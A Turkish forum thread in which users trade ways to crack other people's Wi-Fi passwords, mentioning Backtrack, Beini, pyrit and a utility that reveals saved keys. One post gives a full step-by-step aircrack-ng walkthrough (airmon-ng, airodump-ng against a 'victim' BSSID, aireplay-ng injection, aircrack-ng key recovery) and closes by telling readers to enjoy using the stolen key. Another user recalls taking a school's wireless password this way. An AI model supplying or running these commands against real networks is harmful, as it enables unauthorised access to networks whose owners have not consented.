Wirless Şifre Kırma Yöntemi?

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    otocu
    otocu's avatar
    Erkek

Windowns'un sürümlerinde wireless şifresini kırmak diye bir olay mümkün değildir, eğer bir wireless kıracaksan, linux'ta yaparsın bu işi, ancak şöyle bir program vardı ismini hatırlamıyorum belki bilenler vardı, eğer kişi interneti o anda kullanıyorsa, kullanma sırasında giden gelen byte'ları toplayıp, senin kullanmana yarıyordu, ne demektir bu ? Şu demektir, birikim yapıp harcamak gibi düşün, ancak programın ismini hatırlamıyorum, bir ara bende kullanmıştım..

0100111001100101001000000110111101101100011001000111010100111111
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Erkek

Alfa awus 036 h  marka anteni alıyorsun 

sonra backtrack veya slitaz kuruyorsun 

wep ise kırarsın wpa ise şanslı olman lazım 

handshake wordlist vs 

Part Time Engineer, Full Time Dreamer ..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hsyN
    hsyN's avatar
    Erkek

CaNNi bunu yazdı:
    -----------------------------

wirelesskeyview diye bi program var xp de hemen gösteriyor şifreleri ama benimkinde göstermiyor a.q.
    win7 uyumlu değil galiba.. bilgisi olan varsa paylaşırsa sevinirim.

hocu bu program bağlandığın netin şifresini verir, win7 de bunu yapmak için bağlandığın ağın özelliklerine gir ağ bağlantılarımdan güvenlik filan olması lazım sonra karakterleri göster de gösteriyo :) şimdi xp olduğu için net anlatamadım ama bulursun yani, biz okulun wireless ını öyle buluyoduk :)

test 1 2
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Erkek

pyrit ile saniyede 130k hash yapan birisine şahit oldum wpa'da 

2dkda kırmıştı 8 haneli sayı şifreyi 19611961 ^^

"
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Daniel-Koo
    Daniel-Koo's avatar
    Erkek

Geçen ay güvenliğinden bahsettik bu hafta da hacklemesinden bahsedelim dedim =)

WEP şifreleme tekniğini bu defa Ubuntu işletim sistemi ile hackleyelim.

Öncelikle bilgisayarınıza Wubi programını indirip kurun. Kurulum tamamlandıktan sonra bilgisayarınızı yeniden başlatın ve açılışta size soracağı seçeneklerden Ubuntu’yu seçin... ( Teşekkürler MaSSiMo )

Uygulamalar -> Uçbirim -> sudo apt-get install aircrack-ng yazın ve kurun..

Geri kalanını resimlerle anlatıcam.

1) sudo su komutunu uçbirime girin ve kurulumda yazdığınız şifreyi yazıp enterlayın. ( Şifre yazarken ekranda hiçbişey çıkmayacaktır, siz sadece yazın. )

*Her açtığınız uçbirimde önce bu komutu kullanın ki problem çıkmasın.

iwconfig komutu ile hack işlemini gerçekleştireceğiniz kablosuz ağ kartınızı seçeceksiniz. ( Ben Wireless USB Adaptör kullandığım için wlan1’i seçiyorum. )

2) ifconfig wlan1 komutundan sonra ekranda çıkan MAC adresini bir köşeye kaydediyoruz, ilerleyen komutlarda ihtiyaç duyucaz.

3) airmon-ng start wlan1 komutuyla wlan1 ile yapacağımız işlemleri açtık ve adını mon0 olarak otomatik atadık.

4) airodump-ng -c 6 mon0 komutu ile 6.kanalda wireless ağları arıyorum. Ve kurbanımızı seçtik.

) Yeni bir uçbirim açıp; airodump-ng -c 6 --bssid 40:4A:037:BB:56 --ivs -w bekirdursun mon0 komutu ile paket toplamaya başlıyoruz. Yani artması gereken alanımız.

#Data bölümüdür. ( MAC adresi ise kurbanın MAC’idir. )

6) Olayı biraz hızlandırmak lazım; yeni bir uçbirim açın aireplay-ng -1 2 -o 10 -q 10 -a 40:4A:037:BB:56 -h 00:1a:ef:17:48:75 mon0 komutuyla modemle aramızda paket transferini başlatalım. ( İlk MAC kurbanın, ikincisi ise bizim wireless kartımızın MAC’i. Bununla birlikle resimdeki gibi gülücük alıyorsanız işleminiz başarılıdır. )

7) 6.adımda başlattığımız trafiğin meyvelerini ( paketlerini ) toplamak lazım, aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 40:4A:037:BB:56 -h 00:1a:ef:17:48:75 mon0 komutu ile az önceki trafikten paketleride çekelim.. Resimde gördüğünüz gibi size soru sorduğunda y tuşuna basıp enterlamanız gerekiyor.

) Benim tavsiyem 70bin paket.. Gördüğünüz gibi #Data alanım 70103 oldu ve toplama işlemini durdurmak için CTRL + Z yapıyorum.. ( Yaklaşık 10 dk sürüyor. )

) aircrack-ng -a 1 bekirdursun-01.ivs komutuyla da şifre kırma işlemine geçiyoruz. Bu da yaklaşık 1 sn sürüyor =)

Resimde gördüğünüz; [50:58:55:57:27] şifrenin kullanılan hali: 5058555727’dir. Güle güle kullanın...

Alıntıdır 
    s

server copy finished :D olsun yararlı olur umarım :F  

ne diyon?
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Erkek

Allura bunu yazdı:

pyrit ile saniyede 130k hash yapan birisine şahit oldum wpa'da 

2dkda kırmıştı 8 haneli sayı şifreyi 19611961 ^^

soktumun pyrit bir turlu kuramadım ubuntuya ati 

Ölümlü dünya. Yasin 38. Ayet
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    serwo
    serwo's avatar
    Erkek

otocu bunu yazdı:

Windows'un sürümlerinde wireless şifresini kırmak diye bir olay mümkün değildir......

mümkündür.. ben genelde öyle kırıyorum.. örnek bi program

http://www.youtube.com/watch?v=QbeGOcV-pb0

(çoğunlukla atheros kartlar ile çalışır..)

bu işlerde az bilgisi olanlar içinde beini tavsiye ederim.. 1.2.1- 1.2.2- 1.2.3 versiyonlarını indirin..

unetbootin ile de usb bellege iso yu  yazdırın.. (sadece birini) versiyon, kartınıza uyarsa zaten paket yakalamasından anlarsınız..

usb olması her zaman iyidir.. hızlı açılır hızlı çalışır, hemde uymadığında diğer versiyonu (aynı şekilde) kurarsınız denersiniz... boşa 3 cd yakmazsınızz..

ama wpa yada wpa2 kıramazsınız.. çünkü wordlist ister sizden, onuda usb için eklemeniz gerek.. (meşakkatli iştir.)

... sadece wep için tavsiye edilir..

dipnot : hey sen .. sondan başa okuyan arkadaş ! konu başlığındaki araç hiç bi işe yaramaz.. sadece çalıştırdığın pc de daha önce baglanılmış wep şifrelerini gösterir.)

8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    YekteranBaymedir
    YekteranBaymedir's avatar
    Homo

Beini diye bi boot cdsi var ufak

onda FeedingBottle diye program vardı, backtrack'da amele amele kod gircene bunu kullan

9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    otocu
    otocu's avatar
    Erkek

serwo bunu yazdı:

otocu bunu yazdı:

Windows'un sürümlerinde wireless şifresini kırmak diye bir olay mümkün değildir......

mümkündür.. ben genelde öyle kırıyorum.. örnek bi program

http://www.youtube.com/watch?v=QbeGOcV-pb0

(çoğunlukla atheros kartlar ile çalışır..)

bu işlerde az bilgisi olanlar içinde beini tavsiye ederim.. 1.2.1- 1.2.2- 1.2.3 versiyonlarını indirin..

unetbootin ile de usb bellege iso yu  yazdırın.. (sadece birini) versiyon, kartınıza uyarsa zaten paket yakalamasından anlarsınız..

usb olması her zaman iyidir.. hızlı açılır hızlı çalışır, hemde uymadığında diğer versiyonu (aynı şekilde) kurarsınız denersiniz... boşa 3 cd yakmazsınızz..

ama wpa yada wpa2 kıramazsınız.. çünkü wordlist ister sizden, onuda usb için eklemeniz gerek.. (meşakkatli iştir.)

... sadece wep için tavsiye edilir..

dipnot : hey sen .. sondan başa okuyan arkadaş ! konu başlığındaki araç hiç bi işe yaramaz.. sadece çalıştırdığın pc de daha önce baglanılmış wep şifrelerini gösterir.)

Eyvallah hocam, öğrenmiş olduk :)

0100111001100101001000000110111101101100011001000111010100111111
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    blmrt
    blmrt's avatar
    Erkek

çok karışık işler çok tavsiye .. kolay basit bi anlatım bişey yokmu

İnsanlar çok değişti, dikkat etmek lazım. Biriyle el sıkıştıktan sonra beşi de yerindemi diye parmaklarını saymak zorundasın
Toplam Hit: 11009 Toplam Mesaj: 35